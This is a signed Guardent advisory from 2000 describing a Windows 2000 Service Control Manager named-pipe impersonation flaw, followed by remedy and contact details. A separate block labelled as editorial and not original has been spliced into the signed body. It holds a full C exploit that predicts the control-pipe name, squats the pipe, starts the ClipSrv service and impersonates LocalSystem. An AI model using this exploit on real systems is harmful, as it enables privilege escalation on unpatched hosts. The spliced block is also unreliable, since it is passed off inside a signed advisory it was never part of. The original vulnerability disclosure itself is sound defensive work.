-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

G U A R D E N T
secure digital infrastructure

GUARDENT SECURITY ADVISORY                                     A0108022000
- ----------------------------------------------------------------------

Microsoft Windows 2000 Service Control Manager Named Pipe Impersonation
Vulnerability

August 02, 2000
http://www.guardent.com/A0108022000.html

- ----------------------------------------------------------------------

- -----------------
EXECUTIVE SUMMARY
- -----------------

A vulnerability in the way Windows 2000 handles named pipes allows any
non-privileged local user to elevate their current security context to
that of an arbitrary service started by the service control manager
(SCM). By exploiting this bug, a non-privileged local user can gain
privileged access to the system.

- ----------------
AFFECTED SYSTEMS
- ----------------

Guardent discovered and successfully exploited this vulnerability in
Microsoft Windows 2000. Guardent's research and development team
notified Microsoft when the vulnerability was initially found and worked
with them to fix the problem. Microsoft's advisory is available at:
http://www.microsoft.com/technet/security/bulletin/ms00-053.asp

- -------------------
DETAILED DISCUSSION
- -------------------

The vulnerability resides in the communication mechanism used to
implement a client/server architecture between the service control
manager (SCM) and the services it starts. By exploiting it, a malicious
or unauthorized process can become the server end of the named pipe that
a service, started by the SCM, will connect to. Once it holds the server
end of that pipe, the process can impersonate the security context of
the client connected to it, which in this case is an NT service.

The first step in exploiting the vulnerability is to determine what the
name of the next NT SCM control pipe will be.
This name can be gleaned from the registry value
HKLM\System\CurrentControlSet\Control\ServiceCurrent.

Step two: increment the value and append it to the string
"\\.\pipe\net\NtControlPipe".

Step three: create a named pipe with this name and wait for pipe
clients.

Step four: once the pipe exists, instruct the SCM to start an arbitrary
service. Every service has a security descriptor that dictates to the
SCM which users may perform which actions on that service. Windows 2000
ships with numerous services whose security descriptors allow
interactive accounts to start them, and which also run as LocalSystem;
"ClipBook" is one example. At this point the service that was just
started has connected to the malicious pipe, rather than to the SCM's
pipe as it normally would.

Finally, the basic requirement for impersonation is that the server end
issue a ReadFile call on the pipe. The malicious process can then
impersonate the security context of the client by calling
ImpersonateNamedPipeClient, which gives the malicious thread an
impersonation token of the service that connected to the pipe. The
process can now perform privileged operations under that service's
security context: inject a remote thread, read process memory, or apply
further privilege elevation techniques to obtain administrator
privileges.

- ------
REMEDY
- ------

Guardent notified Microsoft of this issue immediately after discovering
and verifying the problem. As a result, Microsoft was able to locate the
source of the vulnerability and create a hotfix. The hotfix can be
downloaded from:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23432
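The four steps of the detailed discussion above, carried through in Win32 C as an added example. This is editorial illustration, not Guardent's exploit code and not part of the original advisory. It assumes an unpatched Windows 2000 host, that the ServiceCurrent counter is stored as the key's default REG_DWORD value, and that "ClipSrv" is the service name behind the "ClipBook" display name; the pipe-name prediction is plain C and compiles anywhere, while the pipe server, service start and impersonation are guarded by _WIN32.

```c
/* Added example (not Guardent's code): predict the next SCM control-pipe
 * name, own it, start a LocalSystem service, and impersonate it when it
 * connects. Win32 part links against advapi32. */
#include <stdio.h>
#include <string.h>

/* Steps 1-2: the SCM names control pipes \\.\pipe\net\NtControlPipe<N>,
 * with N taken from ServiceCurrent and incremented for each start. Given
 * the counter as read from the registry, write the name the next service
 * will open. Returns 0, or -1 if the buffer is too small. */
int next_control_pipe_name(unsigned long service_current, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "\\\\.\\pipe\\net\\NtControlPipe%lu",
                     service_current + 1);
    return (n > 0 && (size_t)n < outlen) ? 0 : -1;
}

#ifdef _WIN32
#include <windows.h>
#include <sddl.h>

/* Step 1: read the counter. Assumption: it is the key's default (unnamed)
 * REG_DWORD value; confirm with regedit on the target build. */
static int read_service_current(DWORD *value)
{
    HKEY key;
    DWORD type = 0, size = sizeof *value;
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE,
            "SYSTEM\\CurrentControlSet\\Control\\ServiceCurrent",
            0, KEY_QUERY_VALUE, &key) != ERROR_SUCCESS)
        return -1;
    LONG rc = RegQueryValueExA(key, "", NULL, &type, (LPBYTE)value, &size);
    RegCloseKey(key);
    return (rc == ERROR_SUCCESS && type == REG_DWORD) ? 0 : -1;
}

/* Step 4 on its own thread: StartService blocks while the SCM waits for
 * the service, and our main thread must be sitting in ConnectNamedPipe. */
static DWORD WINAPI start_service_thread(LPVOID name)
{
    SC_HANDLE scm = OpenSCManagerA(NULL, NULL, SC_MANAGER_CONNECT);
    if (!scm) return 1;
    SC_HANDLE svc = OpenServiceA(scm, (const char *)name, SERVICE_START);
    if (svc) { StartServiceA(svc, 0, NULL); CloseServiceHandle(svc); }
    CloseServiceHandle(scm);
    return 0;
}

/* Steps 3-5: create the predicted pipe, let the service connect, read its
 * first message (required before impersonation), then impersonate. */
static int hijack_control_pipe(const char *service_name)
{
    DWORD current;
    char pipe_name[128];
    if (read_service_current(&current) != 0 ||
        next_control_pipe_name(current, pipe_name, sizeof pipe_name) != 0)
        return -1;
    HANDLE pipe = CreateNamedPipeA(pipe_name, PIPE_ACCESS_DUPLEX,
        PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT,
        1, 4096, 4096, 0, NULL);
    if (pipe == INVALID_HANDLE_VALUE) return -1;

    HANDLE th = CreateThread(NULL, 0, start_service_thread,
                             (LPVOID)service_name, 0, NULL);
    if (th) CloseHandle(th);
    if (!ConnectNamedPipe(pipe, NULL) && GetLastError() != ERROR_PIPE_CONNECTED)
        return -1;
    BYTE buf[512]; DWORD got = 0;
    if (!ReadFile(pipe, buf, sizeof buf, &got, NULL)) return -1;
    if (!ImpersonateNamedPipeClient(pipe)) return -1;

    /* Check whose context the thread now holds: S-1-5-18 is LocalSystem. */
    HANDLE tok; BYTE tu[256]; DWORD len; char *sid_str = NULL;
    if (OpenThreadToken(GetCurrentThread(), TOKEN_QUERY, TRUE, &tok)) {
        if (GetTokenInformation(tok, TokenUser, tu, sizeof tu, &len) &&
            ConvertSidToStringSidA(((TOKEN_USER *)tu)->User.Sid, &sid_str)) {
            printf("impersonating %s\n", sid_str);
            LocalFree(sid_str);
        }
        CloseHandle(tok);
    }
    /* Privileged work goes here. The token is impersonation-level: it
     * applies to this thread's own calls, not to a child process. */
    RevertToSelf();
    CloseHandle(pipe);
    return 0;
}
#endif

int main(void)
{
    char name[64];
    next_control_pipe_name(41, name, sizeof name);
    printf("counter 41 -> next control pipe %s\n", name);
#ifdef _WIN32
    return hijack_control_pipe("ClipSrv") == 0 ? 0 : 1;
#else
    return 0;
#endif
}
```

Build with a Win32 C compiler and link advapi32; on other platforms only the name prediction compiles and main prints it. The defensive counterpart for any named-pipe server is to create the pipe with FILE_FLAG_FIRST_PIPE_INSTANCE and abort if the name already exists, and for clients to open pipes with SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION so a squatting server cannot obtain an impersonation-level token.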
- ----------------------
ADDITIONAL INFORMATION
- ----------------------

To contact the Guardent R&D team, please send email to:

ALL CONTENTS OF THIS ADVISORY ARE COPYRIGHT 2000, GUARDENT, INC.

- -------------------
ABOUT GUARDENT, INC
- -------------------

Guardent is a next-generation digital security services firm offering
strategic solutions for technology-enabled enterprises. As a trusted
security advisor, Guardent partners with clients to meet their
requirements for the continuous innovation and development of their IT
infrastructures, while mitigating the risks inherent in today's complex
networked environments. Headquartered in the heart of Boston's
technology corridor, Guardent has operations in Washington, D.C.,
Minneapolis, San Francisco, Seattle, Toronto, and London. Obtain more
information on Guardent by calling 888.413.4344 or by visiting us on the
web at http://www.guardent.com.

Press contact:
Dan McCall
Executive Vice President, Guardent, Inc.
dan.mccall@guardent.com
617.513.6623

Technical contact:
Mike Schiffman
Director, Research and Development, Guardent, Inc.
mike.schiffman@guardent.com
888.413.4344

EOF

Mike D. Schiffman
Director of Research and Development
Guardent, Inc.
http://www.guardent.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.3

iQA/AwUBOYhJYAHhCsRVdxmnEQIG2wCg7/cFRgvcg9XzVw6e9/JRau4mqgcAoIu1
bQVxlfZFM4GW4QQbo7nnGN9z
=4cfL
-----END PGP SIGNATURE-----